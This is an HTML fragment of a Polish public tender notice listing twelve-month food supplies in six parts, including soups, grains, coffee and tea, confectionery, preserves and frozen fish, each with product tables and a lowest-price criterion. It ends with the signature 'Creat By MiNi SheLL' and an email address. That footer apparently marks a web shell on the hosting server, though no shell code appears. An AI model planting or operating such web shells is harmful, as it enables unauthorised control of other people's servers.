52	Zupa krem z borowików, zawartość sodu nie więcej niż 0,37 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	1,4 kg	10
53	Zupa ogonowa - ciemna zupa, baza da przygotowania zup gulaszowych lub węgierskich zawartość sodu nie więcej niż 0,43 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny 	1 kg	70
54	Zupa pieczarkowa, zawartość sodu nie więcej niż 0,30 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	3 kg	20
55	Zupa porowa, zawartość sodu nie więcej niż 0,33 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	2,9 kg	12
56	Zupa szparagowa, zawartość sodu nie więcej niż 0,36 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	3 kg	10
57	Żurek, zawartość sodu nie więcej niż 0,39 g na 100 g produktu, typu Knorr, Winiary, Prymat lub równoważny	3 kg	36.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy mąki, kaszy, ryżu, makaronów i produktów zbożowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	NAZWA I OPIS PRODUKTU	WIELKOŚĆ OPAKOWANIA	ILOŚĆ
1	Chrupki kukurydziane typu Świteź-Bis lub równoważne	80 g	800
2	Kasza gryczana	1 kg	900
3	Kasza jęczmienna	1 kg	1000
4	Kasza kukurydziana	1 kg	460
5	Kasza manna	1 kg	500
6	Kleik ryżowy	170 g	50
7	Kotlety sojowe	100 g	60
8	Makaron	5 kg	3000
9	Makaron bezglutenowy	1 kg	20
10	Mąka bezglutenowa	1 kg	5
11	Mąka krupczatka	1 kg	30
12	Mąka pszenna	1 kg	4000
13	Mąka ziemniaczana	1 kg	260
14	Pieczywo lekkie różne rodzaje typu Wasa, Sonko lub równoważne 	140-170 g	150
15	Płatki śniadaniowe,  czekoladowe muszelki lub kuleczki , zawartość błonnika nie mniejsza niż  5,0 g w 100 g produktu, typu Nesquik, Chocapic lub równoważne 	250 g	200
16	Płatki kukurydziane, zawartość błonnika nie mniejsza niż  3,0 g w 100 g produktu, 	1 kg	200
17	Płatki śniadaniowe,  zbożowe kółeczka z miodem, zawartość błonnika nie mniejsza niż  5,0 g w 100 g produktu, typu Cheerios lub równoważne 	250 g	110
18	Płatki owsiane	1 kg	600
19	Płatki ryżowe	1 kg	250
20	Ryż	1 kg	2700
21	Ryż w torebkach	400 g	5
22	Sucharki bez dodatku cukru typu Mamut lub równoważne	285 g	20
23	Sucharki delikatesowe extra typu Mamut lub równoważne	290 g	180
24	Wafle ryżowe typu Sonko lub równoważne	100 g	300
25	Wafle suche	100 g	100
26	Makaron ryżowy	1 kg	60
27	Wędlina sojowa np. parówki sojowe wędzone	160g	50
28	Wędlina sojowa np. parówki sojowe w puszce	400g	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy kawy, herbaty i produktów podobnych;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	NAZWA I OPIS PRODUKTU	WIELKOŚĆ OPAKOWANIA	ILOŚĆ
1	Cappuccino- napój kawowy instant, różne smaki, pakowany w saszetki, typu Moccate lub równoważne 	150 g (10 x 15g)	15
2	Herbata ekspresowa czarna, pojedyncza torebka 1,4 g  typu Saga lub równoważna 	100 torebek	5000
3	Herbata ekspresowa w torebkach 2 g, ze sznurkiem do szybkiego zaparzania, typu Lipton Yellow Label, Tetley lub równoważna	50 torebek	12
4	Herbata owocowa w torebkach 2 g typu Saga lub równoważna	25 torebek	40
5	* Herbata owocowa w torebkach 2,3 g, różne smaki (m.in. miętowa, zielona, malinowa, rumianek z pomarańczą, owoce lasu, aronia, jabłko z gruszką) typu Herbapol lub równoważna	25 torebek	75
6	Kawa rozpuszczalna 100 % typu Jakobs Velvet, Nescafe Classic lub równoważna	200 g	44
7	Kawa zbożowa typu Inka lub równoważna	150 g	45
8	* Kawa rozpuszczalna o delikatnym smaku i bogatym aromacie (100 % naturalnej kawy), w szklanym słoiku o poj. 200 g, typu Nescafe Espiro lub równoważna	200 g	80
9	* Kawa 3 w 1 w saszetkach po 18 g, typu Jacobs, Tchibo lub równoważna	20 saszetek	5
10	* Kawa 2 w 1  w saszetkach po 18 g, typu Jacobs, Tchibo lub równoważna 	20 saszetek	5
11	Kawa mielona Jacobs	500g	5
12	Kawa w ziarnach Jacobs	500g 	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy soli, cukru i wyrobów cukierniczych, kakao, bakalii oraz koncentratów deserów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	NAZWA I OPIS PRODUKTU	WIELKOŚĆ OPAKOWANIA	ILOŚĆ
1	* Biszkopty z galaretką oblane mleczną czekoladą (15 %), bez konserwantów, różne smaki, typu Delicje Szampańskie firmy Wedel lub równoważne 	135 g	52
2	* Biszkopty z galaretką oblane mleczną czekoladą (15 %), bez konserwantów, różne smaki, typu Delicje Szampańskie firmy Wedel lub równoważne 	135 g	80
3	Budyń	41 g	1000
4	Budyń	1 kg	3
5	Ciastka, wafle, andruty, maczki (pastylki z maczkiem kolorowym), różne rodzaje, luzem	1 kg	55
6	* Ciastka suche: kruche, z nadzieniem, markizy (w proporcjonalnych ilościach) o różnych smakach i kształtach w opakowaniach 150 g - 500 g	op. 	65
7	Cukier biały	1 kg	8000
8	Cukier puder	400 g	20
9	Cukier waniliowy	16 g	500
10	* Cukier w saszetkach, cukier biały porcjonowany w saszetki o pojemności 5 g 	5 g 	100
11	Cukierki osobno zawijane, różne rodzaje (karmelkowe, landrynki, krówki, z nadzieniem musującym itp.) 	1 kg	30
12	* Cukierki czekoladowe, osobno zawijane, różne rodzaje typu Michałki, Kasztanki, Malaga lub równoważne	kg	22
13	Cynamon	20 g	40
14	Czekolada, różne smaki i rodzaje, typu Wedel,  lub równoważna	100 g	100
15	Deser Panna Cotta typu Carte dor lub równoważny	0,8 kg	100
16	Galaretka owocowa	75 g	800
17	Galaretka owocowa	1 kg	2
18	Herbatniki typu Petit Beurre lub równoważne	100 g	1000
19	Kakao, ciemne, gorzkie, o mocnym aromacie, wydajne, niskotłuszczowe nadające się do wypieków.	100 g	150
20	Kakao rozpuszczalne typu Puchatek lub równoważne	300 g	50
21	Kisiel	40 g	800
22	Kisiel	1 kg	2
23	Krem orzechowo-czekoladowy do smarowania z orzechami typu Nutella lub równoważny	350 g	20
24	Krakersy słone typu Lajkonik lub równoważne	250 g	10
25	Kwasek cytrynowy	20 g	1700
26	Lizaki (Zamawiający dopuszcza oferowanie lizaków w opakowaniach po 50 szt.)	Op.	20
27	Migdały płatki	80 g	10
28	Migdały całe	100 g	100
29	Olejek do ciast	10 ml	5
30	Orzechy włoskie	100 g	100
31	* Owocowe galaretki w słodkiej posypce, półksiężyce	200 g	25
32	* Paluszki słone typu Lajkonik lub równoważne	70 g	55
33	* Precelki chrupkie słone typu Lajkonik lub równoważne	130 g	55
34	* Pierniki nadziewane w polewie czekoladowej, różne rodzaje i kształty typu Wedel, Kopernik lub równoważne	150-160 g	55
35	Proszek do pieczenia	18 g	500
36	* Praliny z chrupiącego wafelka, z nadzieniem kremowym, wewnątrz migdał, posypane wiórkami kokosowymi, w opakowaniu zbiorczym, typu Rafaello firmy Ferrero lub równoważne	240 g	25
37	* Praliny z chrupiącego wafelka, z nadzieniem kremowym, wewnątrz orzech, obsypane orzechami laskowymi, w opakowaniu zbiorczym, typu Ferrero Rocher firmy Ferrero lub równoważne	200 g	25
38	* Ptasie mleczko - pianka oblana prawdziwą czekoladą (26 %), różne smaki, typu Ptasie mleczko firmy Wedel lub równoważne	420 g	25
39	Rodzynki	200 g	100
40	Sezam	1 kg	10
41	Słonecznik łuskany	1 kg	25
42	Soda oczyszczona	60 g	35
43	Sól	1 kg	2000
44	Śmietana w proszku typu Śnieżka lub równoważne	60 g	30
45	Wafelek typu Grześki bez czekolady lub równoważny 28g w opakowaniu a 30 szt. różne smaki	op.	90
46	Wiórki kokosowe	100 g	200
47	Żelatyna	50 g	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawy przetworów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Produkt	Opis produktu	J.m.	Ilość
1	2	3	4	5.
I.	Dostawa przetworów
1	sok owocowy 200 g (różne smaki) kartonik	FORTUNA, TYMBARK lub równoważne	szt.	1200
2	sok owocowy 1 l. (różne smaki, karton)	FORTUNA, TYMBARK lub równoważne	szt.	720
3	sok owocowy 330 ml (różne smaki)	KUBUŚ, PYSIO lub równoważne	szt.	450
4	sok owocowy 1l (różne smaki)	KUBUŚ, PYSIO lub równoważne	szt.	350
5	Syrop owocowy wysokosłodzony 0,5l	PAOLA, HERBAPOL lub równoważne	szt.	400
6	ananas w syropie  550 g (plastry)	SKO, BAKALLAND lub równoważne	szt.	400
7	brzoskwinie w syropie 820 g (połówki)	SKO lub równoważne	szt.	320
8	mieszanka koktajlowa 200g	SKO lub równoważne	szt.	100
9	seler konserwowy 400g	PTAK lub równoważne	szt.	350
10	fasolka czerwona konserwowa 400g	PTAK lub równoważne	szt.	200
11	szparagi konserwowe 330 g	ROLNIK lub równoważne	szt.	60
12	kukurydza (małe kolby) konserwowa 300 g	ROLNIK lub równoważne	szt.	20
13	cebulka konserwowa 200 g.	PTAK lub równoważne	szt.	20
14	pieczarki konserwowe 900 g	PTAK lub równoważne	szt.	70
15	patisony konserwowe 900 g	PTAK lub równoważne	szt.	30
16	sałatka warzywna szwedzka 900 g	PTAK lub równoważne	szt.	350
17	sałatka warzywna (inna) 900 g	PTAK lub równoważne	szt.	600
18	buraczki konserwowe 900g	ROLNIK lub równoważne	szt.	220
19	oliwki zielone (bez pestki) 900g	ROLNIK lub równoważne	szt.	40
20	oliwki czarne (bez pestki) 900g	ROLNIK lub równoważne	szt.	40
21	Ćwikła 330g	ROLNIK lub równoważne	szt.	300
22	chrzan konserwowy 300g	PTAK lub równoważne	szt.	600
23	Barszcz czerwony - koncentrat w płynie	KRAKUS, ROLNIK lub równoważne	szt.	30
24	groszek konserwowy  400g	PTAK lub równoważne	szt.	400
25	koncentrat pomidorowy 30 %, 4500 g	KNORR lub równoważne	szt.	50
26	koncentrat pomidorowy 30 %, 800 g	KNORR lub równoważne	szt.	600
27	kukurydza konserwowa  380 g	PTAK lub równoważne	szt.	800
28	ogórki konserwowe  900 g	PTAK lub równoważne	szt.	700
29	papryka konserwowa 4500g 	PTAK lub równoważne	szt.	20
30	Szczaw konserwowy 0,5 kg	-------------------------------	szt.	200
31	żurawina  295 g	ROLNIK lub równoważne	szt.	150
32	dżem owocowy niskosłodzony (różne smaki) 1000 g	PSZCZÓŁKA, ŁOWICZ lub równoważne	kg	7000
33	dżem owocowy niesłodzony (bez cukru) 	PSZCZÓŁKA, ŁOWICZ lub równoważne	szt.	20
34	powidła (różne smaki) 1000 g	PSZCZÓŁKA, ŁOWICZ lub równoważne	kg	100
35	śliwki suszone	BAKALLAND lub równoważne	kg	15
36	susz świąteczny	BAKALLAND lub równoważne	kg	30
37	grzyby suszone	BAKALLAND lub równoważne	kg	10
38	masa makowa	BAKALLAND lub równoważne	kg	100
39	rodzynki	BAKALLAND	kg	8
40	miód wielokwiatowy 500g	--------------------------	szt.	10
41	miód wielokwiatowy catering 25g	-------------------------	szt.	1500
42	majonez 330g	ŚWIDNICKI lub równoważny	szt.	300
43	majonez 900g	ŚWIDNICKI lub równoważny	szt.	500
44	ocet 0,5 l	-------------------------	szt.	800
45	musztarda 900g różne gatunki	KAMIS, PUDLISZKI, ROLESKI lub równoważne	szt.	200
46	musztarda 200g różne gatunki	KAMIS, PUDLISZKI, ROLESKI lub równoważne	szt.	200
47	ketchup 1000g		szt.	300
48	sosy do lodów (różne smaki)1000g	KNORR lub równoważne	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawy ryb mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	NAZWA PRODUKTU	J.M.	ILOŚĆ
I.	 RYBY MROŻONE
1	 filet mrożony SHP, bez glazury, bez skóry termin przydatności do spożycia nie krótszy niż 30 dni
ryba wyłącznie miruna lub dorsz
	kg	2200
II.	 INNE RYBY
1	Filety śledziowe a la matias, termin przydatności do spożycia nie krótszy niż 30 dni	kg	450
2	Karp świeży, tusza, termin przydatności do spożycia nie krótszy niż 72 godziny*	kg	110
3	Łosoś wędzony, termin przydatności do spożycia nie krótszy niż 5 dni	kg	5
4	Owoce morza, mieszanka, termin przydatności do spożycia nie krótszy niż 6 miesięcy	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com